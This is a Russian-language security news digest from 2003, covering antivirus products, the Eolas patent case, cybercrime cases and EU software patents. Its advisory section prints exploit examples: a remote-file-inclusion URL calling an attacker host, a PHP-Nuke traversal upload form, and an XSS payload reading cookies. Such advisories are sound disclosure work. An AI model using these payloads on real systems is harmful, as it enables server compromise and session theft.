Компания Panda Software объявила о расширении ассортимента своих программ и представила новое семейство продуктов, нацеленное на удовлетворение требований к информационной безопасности.

Для домашних пользователей будет предназначен Titanium Antivirus 2004. В отличие от более ранней версии, Titanium Antivirus 2004 не просто защищает от вирусов, но и включает в себя систему защиты от таких угроз, как телефонные дозвонщики, компьютерные шутки и мистификации, уязвимость приложений, хакерские взломы и т.д.

Для квалифицированных домашних пользователей, малых предприятий и профессионалов Panda Software представила новый продукт Platinum Internet Security, включающий в себя совокупность технологий для борьбы с угрозами, исходящими из интернета. В частности, данный продукт содержит такие полезные средства, как спам-блокирование и "антишпионский" модуль.

Для удовлетворения потребностей ключевого рыночного сектора - малых компаний и компаний среднего размера, компания Panda Software разработала пакет BusinesSecure - высокоэффективное техническое решение для защиты автоматизированных рабочих мест (АРМ) и файловых служб от всех видов вирусов, троянов и червей. BusinesSecure может быть укомплектован ExchangeSecure для того, чтобы гарантировать защиту любых версий Microsoft Exchange Server.

Другой новый пакет - EnterpriSecure - обеспечивает полную и автоматическую защиту корпоративных сетей. Антивирусные программы не требуют трудоемкой установки, постоянного наблюдения со стороны администраторов и прочего рутинного обслуживания.

Рекомендованные розничные цены Panda Titanium Antivirus 2004 и Panda Platinum Internet Security составят €39,95 и €79.95 соответственно для версий с обслуживанием в течение одного года. Цены специальных студенческих и DVD-версий - €19,95 (Panda Titanium Antivirus 2004) и €34,95 (Panda Platinum Internet Security). Новые корпоративные продукты компании Panda Software будут продаваться по лицензиям в пределах от €57,36 каждая для Panda BusinesSecure Antivirus (от 5 до 25 лицензий с годовым сроком обслуживания) и от €87,95 каждая для Panda EnterpriSecure Antivirus (от 10 до 25 лицензий с годовым сроком обслуживания).

Представители Microsoft подтвердили, что компания собирается внести изменения в Windows и Internet Explorer согласно требованиям суда, признавшего нарушения компанией патентов, принадлежащих Eolas. В 1999 году Eolas предъявил Microsoft иск о нарушении принадлежащих им патентов на технологию плагинов в браузере IE, который использует эту технологию для работы с ActiveX, Java и другими модулями.

Патент допускает чрезвычайно широкую трактовку, и под него подпадают практически все современные браузеры и плагины для них. Под интерактивными программами, внедренными в веб-страницы, можно понимать апплеты Java, ролики Macromedia Flash, различные модули ActiveX и т.п. По мнению суда присяжных, Microsoft нарушила этот патент и должна выплатить Eolas компенсацию в размере 520 млн. долларов США.

В Eolas также хотели бы лицензировать свой патент Microsoft, однако софтверный гигант пока отвергает возможность такого сотрудничества. В компании надеются на подачу апелляционной жалобы и одновременно работают над модификацией Internet Explorer, чтобы браузер не нарушал патенты Eolas. Когда Microsoft впервые объявила о подобных планах, появились опасения в том, что компания сильно ограничит или вовсе исключит поддержку ActiveX из своего браузера. Однако на деле ограничения окажутся не слишком серьезными, хотя использовать Flash-ролики, Java-апплеты и другое активное содержимое будет не так удобно.

Разрешение этого дела было весьма важно не только для Microsoft, но и для других компаний, занимающихся интернет-браузерами, такими как Mozilla, Netscape, Opera и Safari, поскольку все они используют технологию плагинов.

По словам представителей Microsoft, изменения в IE будут внесены к началу следующего года. Компания обеспечит разработчиков документацией, которая поможет в разработке схемы принципиально иного отображения веб-страниц с использованием Adobe Reader, Apple QuickTime, Macromedia Flash, RealNetworks RealOne, Java и Windows Media Player.

Также Microsoft собирается добиваться пересмотра решения суда, которое обязывает компанию выплатить $520 млн. за нарушение патентов. Компания надеется доказать, что никакого нарушения не было, а технология плагинов, используемая в IE, была разработана инженерами компании на основе старых технологий Microsoft.

Компания «Оптима» завершила первый этап комплексного проекта по защите информации в Государственном Таможенном Комитете России. В рамках этого проекта создается защищенная система обмена информацией между подразделениями Государственного Таможенного Комитета (ГТК) России. Система состоит из ряда специальных компонент, объединенных в составе «Подсистемы обеспечения безопасности информации ЕАИС (ОБИ ЕАИС)» и, в частности, включает в себя «Удостоверяющий Центр ИОК». Комплекс средств ОБИ ЕАИС предназначен для обеспечения безопасности информации существующих и проектируемых информационных систем ГТК. Среди них — ведомственная электронная почта ГТК РФ, базы данных органов ГТК, система контроля таможенных платежей и валютно-банковского контроля.

При работе над созданием компонент «Подсистемы ОБИ» специалисты компании «Оптима» разработали программные образцы элементов системы криптографической защиты SQL-соединений, средств организации защищенного удаленного доступа к базам данных через веб-соединение, средств автоматизации криптографической защиты процессов файлового обмена в прикладных подсистемах ЕАИС ГТК, а также средств организации криптографической защиты подсистемы ведомственной электронной почты.

«Удостоверяющий Центр ИОК ГТК» предназначен для организации защищенного электронного документооборота таможенных органов с применением электронной цифровой подписи (ЭЦП) как средства обеспечения целостности, подлинности и юридической значимости электронных документов, а также для обеспечения криптографическими сервисами разнообразных смежных подсистем ЕАИС.

После ввода в эксплуатацию АПК «Удостоверяющий центр ИОК ГТК» предполагается использовать в составе комплекса средств автоматизации центрального вычислительного комплекса Единой автоматизированной информационной системы ГТК России.

Согласно договору, заключенному между ГТК и компанией «Оптима», в 2003-2005 планируется ряд работ по развитию установленных систем.

Большинство российских разработчиков средств защиты исповедуют излишне технократический подход к решению проблем своих клиентов. Данный тезис был основным в выступлении Дмитрия Чепчугова, руководителя Управления "К" МВД, занимающегося расследованием преступлений в сфере информационных технологий. С технической точки зрения информационная система предприятия часто бывает защищена превосходно, но без учета факторов «дуракоустойчивости»2 и обычного предательства уровень защиты нельзя считать достаточным.

В своем выступлении г-н Чепчугов привел несколько реальных примеров из практики ведомства, в которых безответственность персонала и предательство делали техническую систему защиты бессмысленной. Особую известность получил случай с разгильдяйством в информационном агентстве ИТАР ТАСС. По словам руководителя Управления "К", в этот раз безответственность сотрудников «чуть-чуть не довела до беды».

Опыт МВД подтверждает ошибочность использования «бывших хакеров» в качестве специалистов по защите информации в организациях: «Асоциальный тип мышления хакера у такого сотрудника уже сформирован, и брать на работу его нельзя. Хотя, некоторые выросли и стали людьми с изменившейся психикой», — парадоксально высказался г-н Чепчугов.

Поставив во главу угла защиту от внутренних злоумышленников, представитель МВД привел примеры и традиционных преступлений «внешних» мошенников. Особенным стал случай с задержанием подданного Франции, который, будучи разыскиваемым властями своей страны, скрывался в России. С территории нашей страны преступник продолжал осуществлять мошенничества в европейских интернет-магазинах. Общий ущерб от действий француза составил 180 тыс. евро.

Особую озабоченность органов правопорядка вызывает и практика незаконного распространения ведомственных информационных баз. Как сообщил представитель МВД, привлечь к ответственности таких распространителей сегодня нельзя из-за отсутствия соответствующих нормативных актов. Выход из сложившейся ситуации Дмитрий Чепчугов видит в закреплении авторских прав на распространяемые базы за организациями, которые их распространяют. В этом случае злоумышленников можно будет привлекать к ответственности за нарушение авторских прав. Сегодня эти продукты, по словам специалиста, не принадлежат никому.

Специалисты Microsoft ищут альтернативу тактике частого выпуска заплат для операционной системы Windows.

Массовое распространение сетевых червей Slammer и MSBlast еще раз доказало, что большинство пользователей не спешат с установкой заплат к Windows. Поэтому руководство софтверного гиганта ищет пути к изменению своей стратегии в области безопасности.

Наряду с широко известной инициативой "Надежный компьютинг", предусматривающей постепенную замену кода OC Windows и новые подходы к написанию безопасных программ, специалисты Microsoft разрабатывают так называемую тактику "охраны периметра". Подробностей о ней пока немного. Известно лишь, что в рамках новой инициативы компания будет теснее сотрудничать с производителями межсетевых экранов.
4

Преступные синдикаты увеличили свое присутствие в интернете, сосредоточив внимание на вымогательствах, шантаже, детской порнографии и финансовых аферах. Об этом в интервью Reuters сообщил глава британского ведомства по борьбе с компьютерными преступлениями. По словам старшего детектива Лена Хайндса, главы британского Национального отдела по борьбе с высокотехнологичными преступлениями (NHTCU), наиболее вероятными жертвами подобных действий становятся обычные пользователи. "Организованная преступность обратила свой взор на самый слабый элемент цепи - на людей. Руки, нажимающие кнопки на клавиатуре, и есть слабое звено", - заявил г-н Хайндс.

Преступные синдикаты, по словам Хайндса, существуют в любой точке мира. Однако неоднократно расследования NHTCU приводили их в Восточную Европу, включая Украину, Россию и Латвию. Преступники постоянно оттачивают свое компьютерное мастерство, так как все больше и больше деловых операций проходят через интернет. "Организованная преступность очень изворотлива. Она использует для своих нужд любую подходящую возможность" -, заявил г-н Хайндс.

За время двухлетнего существования NHTCU 55 офицеров подразделения произвели около 110 арестов по обвинениям в таких традиционных преступлениях, как шантаж и вымогательство, а также в новых высокотехнологичных преступлениях, например, хакерстве. Сотрудники правопорядка во всем мире подозревают, что преступные сообщества вербуют талантливых программистов для проведения незаконных финансовых операций против банков и компаний.

Все возрастающее число операций против финансовых институтов называется "Получение доступа к конфиденциальной информации через интернет". Суть преступления состоит в том, что преступник регистрирует фальшивый сайт, очень похожий на сайт какого-либо банка и компании. Затем путем обмана он завлекает ничего не подозревающего пользователя на свою страницу в интернете и выманивает у него номер кредитной карты и прочие детали банковского счета. Специалисты из NHTCU сообщают, что около 40 британских компаний уже пострадали от подобных действий в этом году. В прошлом году таких преступлений было зарегистрировано всего семь.

Хакерские атаки, когда-то считавшиеся развлечением маленьких компьютерных гениев, мечтающих доказать свое мастерство, сегодня также вошли в арсенал преступных группировок, говорит г-н Хайндс. Некоторые преступники используют против интернет-провайдеров и интернет-казино так называемые DoS-атаки, когда поток данных, поступающий на сервер блокируется и компании не могут работать с пользователями до тех пор, пока не выплатят нужную сумму вымогателям, устроившим атаку.

Однако большинство преступлений, расследуемых сотрудниками NHTCU по всему миру, связаны с детской порнографией. Около половины из всех 110 арестов были произведены по обвинениям в педофилии, сообщает г-н Хайндс. "Мы обращаем особое внимание на преступные сообщества, делающие деньги на детской порнографии в интернете. В этой области мы сотрудничаем с различными компаниями и институтами. Мы специально направляли наших офицеров за границу, чтобы они смогли перевезти детей, снимающихся в порнографии, в безопасные места", - рассказывает детектив. Международным полицейским силам в последнее время удалось снизить количество детской порнографии в интернете. На прошлой неделе немецкие полицейские сообщили, что они ликвидировали целую преступную сеть педофилов, в которую были вовлечены 26,5 тыс. компьютерных пользователей в 166 странах мира.

Во всех без исключения новых продуктах компании Macromedia (Dreamweaver MX 2004, Flash MX 2004, Fireworks MX 2004) был применён новый, суперсовременный и "надёжный" механизм активации, компания потратила огромную тучу денег на создание, внедрение и развертывание подразделения сотрудников для поддержания этого механизма активации. Но, не прошло и недели с момента выпуска новых программ, как варез-группа PARADOX выпустила эмулятор активации, которым надо было заменить оригинальную dll библиотеку.

Дело на этом не остановилось, 2 октября 2003 года события стали принимать новый оборот, варез-группе "CORE" удаётся создать консольный генератор лицензий и хотя только 10% сгенерированных ключей можно было "официально" даже почти "легально" активировать т.е получалось что продукты ещё не проданы а их уже используют, хотя при этом надо было затратить некоторое время для проверки сгенерированных ключей.

Но уж совсем невероятные события стали развиваться в эти выходные (5-6 октября) когда три совершенно разных источника пришли к удивительному открытию. Как оказалось существуют корпоративные серийные номера с которыми программы Macromedia работают без какой либо активации. Отличительной чертой таких номеров является полное отсутствие упоминания их в "ABOUT" и то что введя один раз этот номер в одну их программ более не требуется вводить в другие, после установки программы будут сразу зарегистрированы без какой либо активации.

После такого очевидного провала по внедрению системы активации в компании Macromedia последуют репрессии, такого позора не было со времён провала компании ADOBE в попытке заблокировать обновление для нелегальных пользователей Photoshop 7.0, когда проставлением простого пробела в регистре отключалась проверка на легальности.

6 октября в уголовном суде присяжных лондонского района Саусварк (Southwark) начались слушанья по делу 19-летнего Аарона Кефри (Aaron Caffrey). Как заявляет обвинение, британский хакер парализовал работу крупнейшего американского порта, пытаясь отомстить девушке, с которой он повздорил в одном из веб-чатов.
Представители обвинения утверждают, что хакер незаконно проник в компьютерную сеть порта техасского города Хьюстон только для того, чтобы отомстить своей знакомой по одному из интернет-чатов. Как сообщили суду эксперты по компьютерной безопасности, Аарон Кефри намеревался вывести из строя компьютер своей жертвы, подвергнув его «электронной бомбардировке» паразитным трафиком с целого ряда промежуточных серверов. Таким образом 19-летний британец намеревался проучить свою собеседницу, известную в чате под именем Bokkie, за то, что она сделала несколько антиамериканских заявлений.

Сам Аарон Кефри страдает синдромом Аспергера - одной из редких форм аутизма. Внешне это выражается в неспособности нормально взаимодействовать с людьми, полном непонимании намеков собеседника, странном фиксированном взгляде, неумении смотреть в глаза собеседнику, неуклюжести в движениях, необычности мимики. Некоторые психиатры утверждают, что именно синдром Аспергера толкает подростков заниматься компьютерным взломом.

По некоторым данным, в то время, когда Кефри атаковал компьютерную сеть американского порта, у него развивался бурный роман с некоей американкой по имени Джессика. Кефри был настолько влюблен в Джессику, что назвал свой компьютер ее именем и посвятил ей часть написанной им программы для взлома сетей.

Порт Хьюстона - восьмой в мире по объему перевозок. Его компьютерная сеть была парализована 20 сентября 2001 года в результате бомбардировки тысячами спамерских электронных писем. До этой атаки составляющие транспортной инфраструктуры крупнейших стран мира никогда не становились объектами хакерских нападений. Как заявил прокурор, взлом компьютерной сети порта мог стоить жизни морякам находившихся в нем судов, и лишь по счастливой случайности никто не пострадал.

Американские следователи смогли выследить Кефри по IP-адресу его компьютера. Он был арестован и допрошен полицией в январе 2002 года. Как заявил сам Аарон Кефри, он стал жертвой других хакеров, которые организовали атаку и подставили его, записав на жесткий диск его ПК компрометирующие данные.

Слушанья по делу Кефри продолжаются.
7

В начале учебного года компания АРМО-Групп передала факультету "Радиоэлектроники летательных аппаратов" Московского Авиационного Института (МАИ) новый комплект оборудования одной из последних моделей системы контроля и управления доступом "Velocity" американской компании Hirsch Electronics, являющейся бизнес-партнером АРМО-Групп. Эта система будет установлена в МАИ, возьмет под охрану помещения факультета и станет объектом изучения и проведения лабораторных работ студентами МАИ, обучающимися по специальности "Комплексная защита объектов информации". В перспективе, в специально оборудованном классе, преподаватели факультета будут проводить тренинги для специалистов российских компаний, которые установят в своих зданиях системы контроля доступа "Velocity".

Управляемая с компьютера система контроля доступа в помещения Velocity представляет собой последнюю модификацию системы контроля доступа компании Hirsch Electronics, созданной для охраны ядерных, военных и государственных объектов. В настоящее время система контроля доступа Velocity охраняет большое число госучреждений США и ряда стран Европы, а также ядерные и коммерческие объекты России и стран СНГ.
В состав переданного МАИ комплекса вошли контроллеры, считыватели, карты доступа, охранные датчики, интерфейсы и русифицированное программное обеспечение Velocity. Данная система удовлетворяет всем требованиям ограничения доступа на гражданские объекты, имеет оптимальный показатель цена/качество и позволяет создать на своей платформе мощную интегрированную систему безопасности, включающую системы видеонаблюдения, мониторинга тревог, видеоидентификации, охранной сигнализации, изготовления пропусков и системы доступа на всех территориально-распределенных объектах одной компании.

Распределенная сетевая архитектура Velocity позволяет оператору с любого компьютера системы управлять доступом в различные зоны, контролировать все сигналы тревоги или осуществлять видеонаблюдение с многочисленных камер. Все стандартные решения в системе контроля доступа принимаются не центральным компьютером, а контроллерами, поэтому информация по всем точкам доступа обрабатывается в режиме реального времени.

К системе контроля доступа Velocity можно подключать различные матричные коммутаторы, а через коммутаторы охранные видеокамеры различных производителей. Встроенная программа "Просмотр видеокамеры" предоставляет возможность перенаправлять поворотные устройства видеокамер, управлять фокусом, диафрагмой и автопанорамированием с помощью мыши или клавиатуры. Командные опции позволяют задать или выбрать предустановку, запустить или остановить тур патрулирования или переключиться на изображение с другой видеокамеры. Изображение может отображаться в маленьком, среднем или большом окне.

Как сказал Вячеслав Шевцов, декан факультета Радиоэлектроники МАИ, на встрече заведующих кафедр факультета и представителей АРМО-Групп по передаче оборудования компании Hirsch, "Переданный нам новый комплекс особенно ценен тем, что представляет собой одно из последних технических решений компании Hirsch - лидера мирового рынка систем безопасности. На базе этого оборудования на факультете будет развернута система контроля доступа, которая возьмет под охрану ряд ответственных помещений факультета, а также станет полигоном для обучения студентов навыкам работы и настройки системы, отвечающей мировым стандартам безопасности. А поскольку АРМО-Групп будет систематически обновлять ПО и электронику, мы сможем готовить выпускников, владеющих не только теоретическими знаниями, но и практическим опытом работы с системами подобного класса, что благоприятно отразится на конкурентоспособности и востребованности выпускников нашего факультета".

Более подробную информацию о системе контроля доступа Velocity, а также о другом оборудовании, устанавливаемом в охранные системы, можно получить на сайте АРМО-Системы.

Источник: пресс-релиз компании АРМО-Системы

С 1 октября 2003 года компания «Гротек» начинает новую маркетинговую программу - «Региональный партнер» и предлагает крупным региональным компаниям – дистрибьюторам, реселлерам, интеграторам и инсталляторам систем безопасности распространять журнал «Системы безопасности» среди своих потребителей.

Рынок систем безопасности в регионах интенсивно расширяется, появляются новые игроки, возрастает интерес к этой сфере и потребность в квалифицированных изданиях. Журнал «Системы безопасности» является изданием № 1 в России на рынке безопасности и оперативной связи и предназначен для руководителей и технических специалистов, профессионально занимающихся проблемами безопасности.

«Гротек» предлагает крупным компаниям – дистрибьюторам, инсталляторам, интеграторам или реселлерам систем безопасности стать участниками программы «Региональный партнер». Суть программы заключается в следующем: компания «Гротек» готова предоставлять региональным компаниям в обмен на анкеты квалифицированной подписки необходимое количество экземпляров журнала «Системы безопасности» для распространения среди своих потребителей.

Источник: пресс-релиз компании Гротек

Компания Microsoft объявила обеспечение безопасности информационных систем одной из своих приоритетных задач. С этой целью запущена программа по повышению безопасности программных продуктов.

В ходе пресс-конференции, посвященной объявлению финансовых результатов за 2002/2003 финансовый год, глава российского представительства Microsoft Ольга Дергунова заявила, что интерес со стороны государства и корпоративного сектора к системам безопасности значительно вырос. Кроме того, компании интересуются и инициативой Trustworthy Computing.

В рамках этой инициативы Microsoft в России были подготовлены свыше 30 информационных материалов (от статей до книг), издан специальный бюллетень для государственных деятелей, разработаны три учебных курса по безопасности информационных систем. Кроме того, Россия стала первой страной, подписавшей с Microsoft соглашение в рамках программы Government Security Program, предусматривающей предоставление правительственным и международным организациям доступа к исходному коду операционных систем Windows.

Однако, по мнению Microsoft, заботиться о безопасности должны не только разработчики программ и системные администраторы, но и пользователи ПО. Информирование пользователей о методах защиты ИТ-систем является целью компании, проходящей под девизом "Пора сменить код". Ее цель - демонстрация способов повышения надежности и безопасности ИТ-инфраструктуры.

В рамках этой компании представительство Microsoft до конца года даст системным администраторам возможность бесплатно пройти обучение в сертифицированном учебном центре после приобретения Microsoft Windows Server 2003.

Покупатель имеет право выбрать любой из сертифицированных учебных центров, располагающихся в России и СНГ. На сайте Microsoft можно оформить заявку на обучение. Кроме этого, в скором времени будут проведены ряд семинаров, на которых специалисты компании расскажут о преимуществах операционных систем Windows Server 2003 и Windows XP, а также возможностях пакета программ ISA Server 2000, использующегося для защиты данных от несанкционированного доступа. Подробнее о семинарах можно узнать на сайте Microsoft.

Программа: XShisen 1.x

Опасность: Низкая

Наличие эксплоита: Нет

Описание: Две уязвимости обнаружена в XShisen. Злонамеренный пользователь может получить поднятые привилегии на системе.

Уязвимость связанна с неправильной проверкой границ в "XSHISENLIB" переменной окружения и "-KCONV" параметре командной строки. В результате локальный пользователь может представить более 100 байт данных, чтобы выполнить произвольный код на системе с привилегиями группы “game”.

URL производителя: http://www.techfirm.co.jp/~masaoki/xshisen.html.en

Решение: Не устанавливайте игры на критических системах.

Программа: EternalMart Mailing List Manager 1.32 Опасность: Высокая Наличие эксплоита: Да Описание: Уязвимость включения произвольных файлов обнаружена в EternalMart Mailing List Manager. Удаленный пользователь может выполнить произвольный PHP код на системе. Сценарии 'email_email_func.php' file и 'admin/auth.php' не проверяют местоположение PHP файла, включаемого в переменных $emml_path и $emml_admin_path соответственно. В результате удаленный пользователь может заставить сервер включить и выполнить произвольный PHP код на системе с привилегиями Web сервера. Пример/Эксплоит: http://[target]/admin/auth.php?emml_admin_path=http://[attacker] где: http://[attacker]/auth_func.php URL производителя: http://www.eternalmart.com/scripts/emml.htm Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. Неофициальное исправление можно найти на http://www.phpsecure.info.

EMML, EMGB : Include() hole

Программа: Sun Solaris 9, Sun Solaris 8, Sun Solaris 7, Sun Solaris 2.6 Опасность: Низкая Наличие эксплоита: Не нужен Описание: Уязвимость обнаружена в Sun Solaris Am7990 ("LANCE") Ethernet Driver. Злонамеренный пользователь может получить потенциально чувствительную информацию. Драйвер заполняет фреймы данными из предыдущих пакетов или памяти ядра. В результате удаленный атакующий может послать специально сформированный пакет к уязвимой системе, чтобы раскрыть потенциально чувствительную информацию. URL производителя: http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert/57040 Решение: Установите соответствующие исправления: Solaris 2.6: http://sunsolve.sun.com/pub-cgi/findPatch.pl?patchId=105181&rev=35 Solaris 7: http://sunsolve.sun.com/pub-cgi/findPatch.pl?patchId=112604&rev=02 Solaris 8: http://sunsolve.sun.com/pub-cgi/findPatch.pl?patchId=112609&rev=02 Solaris 9: http://sunsolve.sun.com/pub-cgi/findPatch.pl?patchId=115172&rev=01

The Am7990 ("LANCE") Ethernet Driver (le(7D)) Reuses Old Frame Buffer Data to Pad Packets

Программа: PHP Prayer Board 0.x

Опасность: Низкая

Наличие эксплоита: Нет

Описание: Уязвимость обнаружена в PHP Prayer Board (PPB). Удаленный пользователь может выполнить XSS нападение и нападение SQL инъекции.

Уязвимость связанна с отсутствием проверки правильности входных данных в "prayerboard.php" и "prayerboard_db.php". Удаленный атакующий может манипулировать SQL запросами или выполнить произвольный код сценария в браузере целевого пользователя.

URL производителя:http://phpprayerboard.sourceforge.net/

Решение: Установите обновленную версию программы: http://sourceforge.net/project/showfiles.php?group_id=56456

Программа: Stonesoft StoneGate High Availability 2.x Опасность: Средняя Наличие эксплоита: Нет Описание: StoneSoft выпустил исправление для SSH IPSec Toolkit в StoneGate. Удаленный атакующий может выполнить отказ в обслуживании на уязвимой системе. Уязвимость связанна с ошибкой расшифровки BER/DER пакетов. Удаленный пользователь может послать специально сформированный BER/DER пакет, чтобы аварийно завершить работу системы. URL производителя: http://www.stonesoft.com/ Решение: Установите соответствующее обновление: http://www.stonesoft.com/document/art/2221.html

SSH IPSec Toolkit Security Bugs

Программа: PHP-Nuke 6.7 Опасность: Средняя Наличие эксплоита: Да Описание: Уязвимость обнаружена в PHP-Nuke на Windows системах. Удаленный пользователь может загрузить и затем выполнить произвольные файлы на системе. Недостаток обнаружен в сценарии 'modules/WebMail/mailattach.php'. Удаленный пользователь может загрузить на сервер файлы с произвольным именем. Удаленный пользователь может определить имя файла, содержащее символы обхода каталога для '$userfile_name' переменной, чтобы загрузить файл в произвольное местоположение на системе. Пример/Эксплоит: <form action="http://[target]/modules/WebMail/mailattach.php?userfile_name=././AvantGo/language/bad. php" method="POST" ENCTYPE="multipart/form-data"> <input type="hidden" name="attachments" value="1"> <input type="file" name="userfile"><br> <input type="submit" name="Send File> </form> URL производителя: http:/www.phpnuke.org/ Решение: Запретите доступ Web пользователю на запись на уровне файловой системы.

PHP-Nuke v 6.7 + Windows = File Upload

Программа: Stonesoft StoneBeat FullCluster 2.x, Stonesoft StoneBeat FullCluster 3.x, Stonesoft StoneBeat High Availability 2.x, Stonesoft StoneBeat SecurityCluster 2.x, Stonesoft StoneBeat WebCluster 2.x, Stonesoft StoneGate High Availability 2.x Опасность: Высокая Наличие эксплоита: Нет Описание: Stonesoft выпустил исправление для StoneGate и StoneBeat, которое устраняет недавно обнаруженные уязвимости в OpenSSL. Злонамеренный пользователь может выполнить DoS нападение и потенциально скомпрометировать уязвимую систему. URL производителя: http://www.stonesoft.com/download/ Решение: Установите соответствующее исправление: http://www.stonesoft.com/download/

Stonesoft Corp. Security Advisory

Программа: F-Secure SSH 5.x for Windows, F-Secure SSH 3.x for Unix Опасность: Средняя Наличие эксплоита: Нет Описание: Уязвимость обнаружена в F-Secure SSH. Злонамеренный пользователь может вызвать отказ в обслуживании на уязвимой системе. Уязвимость связанна с ошибкой расшифровки BER/DER пакетов. URL производителя:http://www.f-secure.com/support/technical/ssh/ssh2_digital_certificates_tech.shtml Решение: Установите обновленную версию программы: F-Secure SSH Server for Unix 3.2.3 build 14: http://www.f-secure.com/webclub/ssh/unixsrv.shtml F-Secure SSH Client for Unix 3.2.3 build 14: http://www.f-secure.com/webclub/ssh/unixclient.shtml F-Secure SSH Server for Windows 5.2 build 38: http://www.f-secure.com/webclub/ssh/winsrv.shtml F-Secure SSH Client for Windows 5.3 build 21: http://www.f-secure.com/webclub/ssh/winclient.shtml

A vulnerability has been discovered in F-Secure SSH in the way it handles digital certificates

Программа: Conexant Access Runner 3.21 Опасность: Высокая Наличие эксплоита: Не нужен Описание: Уязвимость обнаружена в Conexant Access runner. Удаленный пользователь может получить административный доступ к устройству. Удаленный пользователь может подключиться к устройству и обойти процесс аутентификации, вводя неправильный пароль и затем наживая клавишу Enter после "please try again" сообщения. В результате удаленный пользователь может получить административные привилегии. URL производителя: http://www.conexant.com/ Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. Ограничьте доступ к устройству только доверенным пользователям.

Conexant Access Runner DSL Console login bypass vulnerability

Программа: Divine Content Server 5.x Опасность: Низкая Наличие эксплоита: Да Описание: Уязвимость обнаружена в divine Content Server. Удаленный пользователь может выполнить XSS нападение. Уязвимость в проверке правильности входных данных обнаружена в параметре pagename в сценарии ContentServer. Пример/Эксплоит: http://[target]/servlet/ContentServer?pagename=<body%20onload=alert(docu ment.cookie);> URL производителя:http://www.divine.com/ Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Divine OpenMarket Content Server XSS

Аналитическая фирма Gartner предупредила, что решение Европейского парламента ограничить возможность патентования программного обеспечения и бизнес-методов грозит «патентной войной», в результате которой может быть запрещен доступ из США к некоторым европейским сайтам электронной коммерции.

Недавно Европарламент проголосовал за утверждение «Директивы о патентоспособности изобретений, реализованных при помощи компьютера», но с рядом поправок, ограничивающих возможные способы патентования программного обеспечения. Например, нельзя патентовать просто программное обеспечение, а от производителей ПО не следует требовать лицензирования запатентованной технологии в целях обеспечения совместимости — например, при создании устройства, способного воспроизводить запатентованный медиаформат, или программы, считывающей и записывающей запатентованные конкурентом форматы файлов.

Кроме того, поправки запрещают патентование «бизнес-методов», таких как запатентованный Amazon способ покупки One-Click. В США бизнес-методы и чистое ПО патентуются обычным образом — ИТ-менеджеры, разработчики ПО, экономисты и другие подвергали эту практику резкой критике как вредную для конкуренции и инноваций.

Теперь аналитическая фирма Gartner указывает на потенциальные проблемы, которые могут возникнуть в результате несоответствия между системами патентования Евросоюза и США, даже если европейская система окажется более эффективной. Например, если в США патентование технологии электронной коммерции возможно, а в Евросоюзе нет, то американские пользователи, обращаясь на европейские веб-сайты, где используется данная технология, будут нарушать закон, утверждает Gartner. «Если директива с поправками будет принята, существенные разночтения между американским и европейским законами о патентовании ПО могут привести к патентной войне», — говорится в заявлении аналитической фирмы.

По оценке Gartner, любые практические последствия проявятся не раньше конца 2005 года — это самый ранний срок, когда правительства стран Евросоюза смогут превратить положения директивы в государственные законы.

Судя по документам, с которыми удалось ознакомиться ZDNet UK, правительство США тоже выразило озабоченность поправками к директиве. В письме Европейскому парламенту с комментариями поправок, отправленному еще до голосования, представитель правительства США выделил три статьи директивы как особенно «проблематичные». Большинство претензий вызвала Статья 6(а), в которой утверждается, что патенты не могут использоваться для ограничения совместимости. Представитель порекомендовал удалить эту статью. «В целом охват Статьи 6(а) настолько широк, что она может существенно ограничить права владельцев патентов, — написал он. — Если возникнет спор об антиконкурентном использовании патентов, он должен решаться на основании антимонопольных законов».

Организация Foundation for a Free Information Infrastructure (FFII), лоббировавшая поправки, ответила, что абсурдно опираться на антитрестовский закон, чтобы защитить индустрию ПО от попыток компаний взять под свой контроль стандарты обмена данными. «Дело американского Министерства юстиции против Microsoft показало всю ненадежность и неэффективность закона о конкуренции в данной сфере, — говорится в заявлении организации. — Положения о конкуренции должны быть введены в директиву о патентах, регулирующую решение проблем, связанных с программным обеспечением».

Теперь директива о патентах вновь возвратится в Европейскую комиссию для пересмотра, после чего состоится голосование в Парламенте и Совете министров, а затем, в случае ее утверждения, она будет воплощена в государственных законах стран-членов Евросоюза.

Однако Европейская комиссия дала понять, что поправки могут оказаться «неприемлемыми» для нее и что она рассматривает вопрос об изъятии директивы.